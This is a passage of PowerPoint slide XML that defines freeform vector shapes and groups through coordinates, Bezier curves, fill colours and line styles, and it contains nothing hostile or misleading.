                      <a:gd name="T3" fmla="*/ 309 h 309"/>
                      <a:gd name="T4" fmla="*/ 572 w 572"/>
                      <a:gd name="T5" fmla="*/ 113 h 309"/>
                      <a:gd name="T6" fmla="*/ 152 w 572"/>
                      <a:gd name="T7" fmla="*/ 0 h 309"/>
                      <a:gd name="T8" fmla="*/ 0 w 572"/>
                      <a:gd name="T9" fmla="*/ 196 h 3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2" h="309">
                        <a:moveTo>
                          <a:pt x="0" y="196"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="421" y="309"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="572" y="113"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="152" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="196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Freeform 531"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="1255" y="2255"/>
                    <a:ext cx="259" cy="141"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 572 w 572"/>
                      <a:gd name="T1" fmla="*/ 114 h 312"/>
                      <a:gd name="T2" fmla="*/ 149 w 572"/>
                      <a:gd name="T3" fmla="*/ 0 h 312"/>
                      <a:gd name="T4" fmla="*/ 0 w 572"/>
                      <a:gd name="T5" fmla="*/ 199 h 312"/>
                      <a:gd name="T6" fmla="*/ 421 w 572"/>
                      <a:gd name="T7" fmla="*/ 312 h 312"/>
                      <a:gd name="T8" fmla="*/ 572 w 572"/>
                      <a:gd name="T9" fmla="*/ 114 h 3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2" h="312">
                        <a:moveTo>
                          <a:pt x="572" y="114"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="149" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="199"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="421" y="312"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="572" y="114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1" name="Freeform 532"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="1323" y="2345"/>
                    <a:ext cx="260" cy="140"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 572 w 572"/>
                      <a:gd name="T1" fmla="*/ 113 h 309"/>
                      <a:gd name="T2" fmla="*/ 151 w 572"/>
                      <a:gd name="T3" fmla="*/ 0 h 309"/>
                      <a:gd name="T4" fmla="*/ 0 w 572"/>
                      <a:gd name="T5" fmla="*/ 196 h 309"/>
                      <a:gd name="T6" fmla="*/ 421 w 572"/>
                      <a:gd name="T7" fmla="*/ 309 h 309"/>
                      <a:gd name="T8" fmla="*/ 572 w 572"/>
                      <a:gd name="T9" fmla="*/ 113 h 3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2" h="309">
                        <a:moveTo>
                          <a:pt x="572" y="113"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="151" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="196"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="421" y="309"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="572" y="113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2" name="Freeform 533"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="1529" y="2612"/>
                    <a:ext cx="259" cy="140"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 571"/>
                      <a:gd name="T1" fmla="*/ 196 h 309"/>
                      <a:gd name="T2" fmla="*/ 420 w 571"/>
                      <a:gd name="T3" fmla="*/ 309 h 309"/>
                      <a:gd name="T4" fmla="*/ 571 w 571"/>
                      <a:gd name="T5" fmla="*/ 111 h 309"/>
                      <a:gd name="T6" fmla="*/ 151 w 571"/>
                      <a:gd name="T7" fmla="*/ 0 h 309"/>
                      <a:gd name="T8" fmla="*/ 0 w 571"/>
                      <a:gd name="T9" fmla="*/ 196 h 3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1" h="309">
                        <a:moveTo>
                          <a:pt x="0" y="196"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="420" y="309"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="571" y="111"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="151" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="196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3" name="Freeform 534"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="1461" y="2522"/>
                    <a:ext cx="258" cy="141"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 571"/>
                      <a:gd name="T1" fmla="*/ 199 h 310"/>
                      <a:gd name="T2" fmla="*/ 420 w 571"/>
                      <a:gd name="T3" fmla="*/ 310 h 310"/>
                      <a:gd name="T4" fmla="*/ 571 w 571"/>
                      <a:gd name="T5" fmla="*/ 113 h 310"/>
                      <a:gd name="T6" fmla="*/ 151 w 571"/>
                      <a:gd name="T7" fmla="*/ 0 h 310"/>
                      <a:gd name="T8" fmla="*/ 0 w 571"/>
                      <a:gd name="T9" fmla="*/ 199 h 3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1" h="310">
                        <a:moveTo>
                          <a:pt x="0" y="199"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="420" y="310"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="571" y="113"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="151" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="199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4" name="Freeform 535"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="1219" y="2315"/>
                    <a:ext cx="646" cy="817"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 1329 w 1426"/>
                      <a:gd name="T1" fmla="*/ 0 h 1805"/>
                      <a:gd name="T2" fmla="*/ 0 w 1426"/>
                      <a:gd name="T3" fmla="*/ 1734 h 1805"/>
                      <a:gd name="T4" fmla="*/ 92 w 1426"/>
                      <a:gd name="T5" fmla="*/ 1805 h 1805"/>
                      <a:gd name="T6" fmla="*/ 1426 w 1426"/>
                      <a:gd name="T7" fmla="*/ 64 h 1805"/>
                      <a:gd name="T8" fmla="*/ 1329 w 1426"/>
                      <a:gd name="T9" fmla="*/ 0 h 18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26" h="1805">
                        <a:moveTo>
                          <a:pt x="1329" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="1734"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="92" y="1805"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1426" y="64"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1329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5" name="Freeform 536"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="1207" y="2295"/>
                    <a:ext cx="65" cy="70"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 48 w 61"/>
                      <a:gd name="T1" fmla="*/ 47 h 65"/>
                      <a:gd name="T2" fmla="*/ 50 w 61"/>
                      <a:gd name="T3" fmla="*/ 4 h 65"/>
                      <a:gd name="T4" fmla="*/ 37 w 61"/>
                      <a:gd name="T5" fmla="*/ 0 h 65"/>
                      <a:gd name="T6" fmla="*/ 27 w 61"/>
                      <a:gd name="T7" fmla="*/ 3 h 65"/>
                      <a:gd name="T8" fmla="*/ 9 w 61"/>
                      <a:gd name="T9" fmla="*/ 18 h 65"/>
                      <a:gd name="T10" fmla="*/ 0 w 61"/>
                      <a:gd name="T11" fmla="*/ 37 h 65"/>
                      <a:gd name="T12" fmla="*/ 0 w 61"/>
                      <a:gd name="T13" fmla="*/ 51 h 65"/>
                      <a:gd name="T14" fmla="*/ 7 w 61"/>
                      <a:gd name="T15" fmla="*/ 61 h 65"/>
                      <a:gd name="T16" fmla="*/ 19 w 61"/>
                      <a:gd name="T17" fmla="*/ 65 h 65"/>
                      <a:gd name="T18" fmla="*/ 31 w 61"/>
                      <a:gd name="T19" fmla="*/ 62 h 65"/>
                      <a:gd name="T20" fmla="*/ 48 w 61"/>
                      <a:gd name="T21" fmla="*/ 47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1" h="65">
                        <a:moveTo>
                          <a:pt x="48" y="47"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="60" y="32"/>
                          <a:pt x="61" y="12"/>
                          <a:pt x="50" y="4"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="47" y="1"/>
                          <a:pt x="42" y="0"/>
                          <a:pt x="37" y="0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1" y="6"/>
                          <a:pt x="14" y="11"/>
                          <a:pt x="9" y="18"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5" y="24"/>
                          <a:pt x="2" y="30"/>
                          <a:pt x="0" y="37"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="51"/>
                          <a:pt x="0" y="51"/>
                          <a:pt x="0" y="51"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1" y="55"/>
                          <a:pt x="4" y="59"/>
                          <a:pt x="7" y="61"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="10" y="64"/>
                          <a:pt x="15" y="65"/>
                          <a:pt x="19" y="65"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="31" y="62"/>
                          <a:pt x="31" y="62"/>
                          <a:pt x="31" y="62"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="37" y="59"/>
                          <a:pt x="43" y="54"/>
                          <a:pt x="48" y="47"/>
                        </a:cubicBezTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="4D4D4D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6" name="Freeform 537"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="1608" y="2819"/>
                    <a:ext cx="66" cy="69"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 48 w 61"/>
                      <a:gd name="T1" fmla="*/ 48 h 65"/>
                      <a:gd name="T2" fmla="*/ 50 w 61"/>
                      <a:gd name="T3" fmla="*/ 4 h 65"/>
                      <a:gd name="T4" fmla="*/ 37 w 61"/>
                      <a:gd name="T5" fmla="*/ 1 h 65"/>
                      <a:gd name="T6" fmla="*/ 27 w 61"/>
                      <a:gd name="T7" fmla="*/ 3 h 65"/>
                      <a:gd name="T8" fmla="*/ 9 w 61"/>
                      <a:gd name="T9" fmla="*/ 18 h 65"/>
                      <a:gd name="T10" fmla="*/ 0 w 61"/>
                      <a:gd name="T11" fmla="*/ 37 h 65"/>
                      <a:gd name="T12" fmla="*/ 0 w 61"/>
                      <a:gd name="T13" fmla="*/ 51 h 65"/>
                      <a:gd name="T14" fmla="*/ 6 w 61"/>
                      <a:gd name="T15" fmla="*/ 61 h 65"/>
                      <a:gd name="T16" fmla="*/ 19 w 61"/>
                      <a:gd name="T17" fmla="*/ 65 h 65"/>
                      <a:gd name="T18" fmla="*/ 31 w 61"/>
                      <a:gd name="T19" fmla="*/ 62 h 65"/>
                      <a:gd name="T20" fmla="*/ 48 w 61"/>
                      <a:gd name="T21" fmla="*/ 48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1" h="65">
                        <a:moveTo>
                          <a:pt x="48" y="48"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="60" y="32"/>
                          <a:pt x="61" y="12"/>
                          <a:pt x="50" y="4"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="46" y="1"/>
                          <a:pt x="42" y="0"/>
                          <a:pt x="37" y="1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0" y="6"/>
                          <a:pt x="14" y="11"/>
                          <a:pt x="9" y="18"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4" y="24"/>
                          <a:pt x="1" y="31"/>
                          <a:pt x="0" y="37"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="51"/>
                          <a:pt x="0" y="51"/>
                          <a:pt x="0" y="51"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1" y="55"/>
                          <a:pt x="3" y="59"/>
                          <a:pt x="6" y="61"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="10" y="64"/>
                          <a:pt x="14" y="65"/>
                          <a:pt x="19" y="65"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="31" y="62"/>
                          <a:pt x="31" y="62"/>
                          <a:pt x="31" y="62"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="37" y="59"/>
                          <a:pt x="43" y="54"/>
                          <a:pt x="48" y="48"/>
                        </a:cubicBezTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="4D4D4D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7" name="Freeform 538"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="1407" y="2555"/>
                    <a:ext cx="65" cy="70"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 47 w 61"/>
                      <a:gd name="T1" fmla="*/ 47 h 65"/>
                      <a:gd name="T2" fmla="*/ 50 w 61"/>
                      <a:gd name="T3" fmla="*/ 3 h 65"/>
                      <a:gd name="T4" fmla="*/ 36 w 61"/>
                      <a:gd name="T5" fmla="*/ 0 h 65"/>
                      <a:gd name="T6" fmla="*/ 26 w 61"/>
                      <a:gd name="T7" fmla="*/ 3 h 65"/>
                      <a:gd name="T8" fmla="*/ 8 w 61"/>
                      <a:gd name="T9" fmla="*/ 17 h 65"/>
                      <a:gd name="T10" fmla="*/ 0 w 61"/>
                      <a:gd name="T11" fmla="*/ 36 h 65"/>
                      <a:gd name="T12" fmla="*/ 0 w 61"/>
                      <a:gd name="T13" fmla="*/ 50 h 65"/>
                      <a:gd name="T14" fmla="*/ 6 w 61"/>
                      <a:gd name="T15" fmla="*/ 61 h 65"/>
                      <a:gd name="T16" fmla="*/ 19 w 61"/>
                      <a:gd name="T17" fmla="*/ 64 h 65"/>
                      <a:gd name="T18" fmla="*/ 30 w 61"/>
                      <a:gd name="T19" fmla="*/ 61 h 65"/>
                      <a:gd name="T20" fmla="*/ 47 w 61"/>
                      <a:gd name="T21" fmla="*/ 47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1" h="65">
                        <a:moveTo>
                          <a:pt x="47" y="47"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="60" y="31"/>
                          <a:pt x="61" y="12"/>
                          <a:pt x="50" y="3"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="46" y="1"/>
                          <a:pt x="41" y="0"/>
                          <a:pt x="36" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="26" y="3"/>
                          <a:pt x="26" y="3"/>
                          <a:pt x="26" y="3"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="20" y="5"/>
                          <a:pt x="14" y="10"/>
                          <a:pt x="8" y="17"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4" y="23"/>
                          <a:pt x="1" y="30"/>
                          <a:pt x="0" y="36"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="50"/>
                          <a:pt x="0" y="50"/>
                          <a:pt x="0" y="50"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1" y="55"/>
                          <a:pt x="3" y="58"/>
                          <a:pt x="6" y="61"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="10" y="63"/>
                          <a:pt x="14" y="65"/>
                          <a:pt x="19" y="64"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="30" y="61"/>
                          <a:pt x="30" y="61"/>
                          <a:pt x="30" y="61"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="37" y="58"/>
                          <a:pt x="43" y="53"/>
                          <a:pt x="47" y="47"/>
                        </a:cubicBezTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="4D4D4D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8" name="Freeform 539"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="1810" y="3080"/>
                    <a:ext cx="65" cy="70"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 48 w 61"/>
                      <a:gd name="T1" fmla="*/ 48 h 65"/>
                      <a:gd name="T2" fmla="*/ 50 w 61"/>
                      <a:gd name="T3" fmla="*/ 4 h 65"/>
                      <a:gd name="T4" fmla="*/ 37 w 61"/>
                      <a:gd name="T5" fmla="*/ 1 h 65"/>
                      <a:gd name="T6" fmla="*/ 27 w 61"/>
                      <a:gd name="T7" fmla="*/ 3 h 65"/>
                      <a:gd name="T8" fmla="*/ 9 w 61"/>
                      <a:gd name="T9" fmla="*/ 18 h 65"/>
                      <a:gd name="T10" fmla="*/ 0 w 61"/>
                      <a:gd name="T11" fmla="*/ 37 h 65"/>
                      <a:gd name="T12" fmla="*/ 0 w 61"/>
                      <a:gd name="T13" fmla="*/ 51 h 65"/>
                      <a:gd name="T14" fmla="*/ 7 w 61"/>
                      <a:gd name="T15" fmla="*/ 61 h 65"/>
                      <a:gd name="T16" fmla="*/ 19 w 61"/>
                      <a:gd name="T17" fmla="*/ 65 h 65"/>
                      <a:gd name="T18" fmla="*/ 31 w 61"/>
                      <a:gd name="T19" fmla="*/ 62 h 65"/>
                      <a:gd name="T20" fmla="*/ 48 w 61"/>
                      <a:gd name="T21" fmla="*/ 48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1" h="65">
                        <a:moveTo>
                          <a:pt x="48" y="48"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="60" y="32"/>
                          <a:pt x="61" y="12"/>
                          <a:pt x="50" y="4"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="47" y="1"/>
                          <a:pt x="42" y="0"/>
                          <a:pt x="37" y="1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1" y="6"/>
                          <a:pt x="14" y="11"/>
                          <a:pt x="9" y="18"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4" y="24"/>
                          <a:pt x="1" y="31"/>
                          <a:pt x="0" y="37"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="51"/>
                          <a:pt x="0" y="51"/>
                          <a:pt x="0" y="51"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1" y="55"/>
                          <a:pt x="3" y="59"/>
                          <a:pt x="7" y="61"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="10" y="64"/>
                          <a:pt x="14" y="65"/>
                          <a:pt x="19" y="65"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="31" y="62"/>
                          <a:pt x="31" y="62"/>
                          <a:pt x="31" y="62"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="37" y="59"/>
                          <a:pt x="43" y="54"/>
                          <a:pt x="48" y="48"/>
                        </a:cubicBezTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="4D4D4D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9" name="Freeform 540"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="1862" y="3054"/>
                    <a:ext cx="204" cy="95"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 191 w 191"/>
                      <a:gd name="T1" fmla="*/ 89 h 89"/>
                      <a:gd name="T2" fmla="*/ 191 w 191"/>
                      <a:gd name="T3" fmla="*/ 89 h 89"/>
                      <a:gd name="T4" fmla="*/ 186 w 191"/>
                      <a:gd name="T5" fmla="*/ 86 h 89"/>
                      <a:gd name="T6" fmla="*/ 179 w 191"/>
                      <a:gd name="T7" fmla="*/ 76 h 89"/>
                      <a:gd name="T8" fmla="*/ 179 w 191"/>
                      <a:gd name="T9" fmla="*/ 62 h 89"/>
                      <a:gd name="T10" fmla="*/ 183 w 191"/>
                      <a:gd name="T11" fmla="*/ 51 h 89"/>
                      <a:gd name="T12" fmla="*/ 183 w 191"/>
                      <a:gd name="T13" fmla="*/ 51 h 89"/>
                      <a:gd name="T14" fmla="*/ 5 w 191"/>
                      <a:gd name="T15" fmla="*/ 3 h 89"/>
                      <a:gd name="T16" fmla="*/ 5 w 191"/>
                      <a:gd name="T17" fmla="*/ 3 h 89"/>
                      <a:gd name="T18" fmla="*/ 5 w 191"/>
                      <a:gd name="T19" fmla="*/ 3 h 89"/>
                      <a:gd name="T20" fmla="*/ 1 w 191"/>
                      <a:gd name="T21" fmla="*/ 14 h 89"/>
                      <a:gd name="T22" fmla="*/ 0 w 191"/>
                      <a:gd name="T23" fmla="*/ 25 h 89"/>
                      <a:gd name="T24" fmla="*/ 9 w 191"/>
                      <a:gd name="T25" fmla="*/ 38 h 89"/>
                      <a:gd name="T26" fmla="*/ 20 w 191"/>
                      <a:gd name="T27" fmla="*/ 42 h 89"/>
                      <a:gd name="T28" fmla="*/ 191 w 191"/>
                      <a:gd name="T29" fmla="*/ 89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91" h="89">
                        <a:moveTo>
                          <a:pt x="191" y="89"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="191" y="89"/>
                          <a:pt x="191" y="89"/>
                          <a:pt x="191" y="89"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="189" y="89"/>
                          <a:pt x="187" y="88"/>
                          <a:pt x="186" y="86"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="182" y="84"/>
                          <a:pt x="180" y="80"/>
                          <a:pt x="179" y="76"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="179" y="62"/>
                          <a:pt x="179" y="62"/>
                          <a:pt x="179" y="62"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="180" y="58"/>
                          <a:pt x="181" y="54"/>
                          <a:pt x="183" y="51"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="183" y="51"/>
                          <a:pt x="183" y="51"/>
                          <a:pt x="183" y="51"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="183" y="51"/>
                          <a:pt x="6" y="0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3" y="7"/>
                          <a:pt x="2" y="10"/>
                          <a:pt x="1" y="14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cubicBezTo>
                          <a:pt x="2" y="29"/>
                          <a:pt x="5" y="35"/>
                          <a:pt x="9" y="38"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="12" y="40"/>
                          <a:pt x="20" y="42"/>
                          <a:pt x="20" y="42"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="191" y="89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57" name="Group 541"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1493" y="2743"/>
                  <a:ext cx="1087" cy="509"/>
                  <a:chOff x="854" y="2913"/>
                  <a:chExt cx="1087" cy="509"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="258" name="Group 542"/>
                  <p:cNvGrpSpPr>
                    <a:grpSpLocks noChangeAspect="1"/>
                  </p:cNvGrpSpPr>
                  <p:nvPr/>
                </p:nvGrpSpPr>
                <p:grpSpPr bwMode="auto">
                  <a:xfrm flipH="1">
                    <a:off x="1254" y="3218"/>
                    <a:ext cx="68" cy="204"/>
                    <a:chOff x="2699" y="3062"/>
                    <a:chExt cx="137" cy="415"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="282" name="Freeform 543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2768" y="3062"/>
                      <a:ext cx="68" cy="415"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 68"/>
                        <a:gd name="T1" fmla="*/ 415 h 415"/>
                        <a:gd name="T2" fmla="*/ 68 w 68"/>
                        <a:gd name="T3" fmla="*/ 396 h 415"/>
                        <a:gd name="T4" fmla="*/ 68 w 68"/>
                        <a:gd name="T5" fmla="*/ 0 h 415"/>
                        <a:gd name="T6" fmla="*/ 0 w 68"/>
                        <a:gd name="T7" fmla="*/ 16 h 415"/>
                        <a:gd name="T8" fmla="*/ 0 w 68"/>
                        <a:gd name="T9" fmla="*/ 415 h 41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" h="415">
                          <a:moveTo>
                            <a:pt x="0" y="415"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="68" y="396"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="68" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="16"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="415"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="4D4D4D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3" name="Freeform 54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2699" y="3062"/>
                      <a:ext cx="69" cy="415"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 69 w 69"/>
                        <a:gd name="T1" fmla="*/ 415 h 415"/>
                        <a:gd name="T2" fmla="*/ 3 w 69"/>
                        <a:gd name="T3" fmla="*/ 396 h 415"/>
                        <a:gd name="T4" fmla="*/ 0 w 69"/>
                        <a:gd name="T5" fmla="*/ 0 h 415"/>
                        <a:gd name="T6" fmla="*/ 69 w 69"/>
                        <a:gd name="T7" fmla="*/ 16 h 415"/>
                        <a:gd name="T8" fmla="*/ 69 w 69"/>
                        <a:gd name="T9" fmla="*/ 415 h 41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9" h="415">
                          <a:moveTo>
                            <a:pt x="69" y="415"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3" y="396"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="69" y="16"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="69" y="415"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="808080"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="80808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59" name="Group 545"/>
                  <p:cNvGrpSpPr>
                    <a:grpSpLocks noChangeAspect="1"/>
                  </p:cNvGrpSpPr>
                  <p:nvPr/>
                </p:nvGrpSpPr>
                <p:grpSpPr bwMode="auto">
                  <a:xfrm flipH="1">
                    <a:off x="1873" y="3052"/>
                    <a:ext cx="68" cy="204"/>
                    <a:chOff x="2338" y="3066"/>
                    <a:chExt cx="68" cy="204"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="280" name="Freeform 54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2372" y="3066"/>
                      <a:ext cx="34" cy="204"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 68"/>
                        <a:gd name="T1" fmla="*/ 415 h 415"/>
                        <a:gd name="T2" fmla="*/ 68 w 68"/>
                        <a:gd name="T3" fmla="*/ 396 h 415"/>
                        <a:gd name="T4" fmla="*/ 68 w 68"/>
                        <a:gd name="T5" fmla="*/ 0 h 415"/>
                        <a:gd name="T6" fmla="*/ 0 w 68"/>
                        <a:gd name="T7" fmla="*/ 16 h 415"/>
                        <a:gd name="T8" fmla="*/ 0 w 68"/>
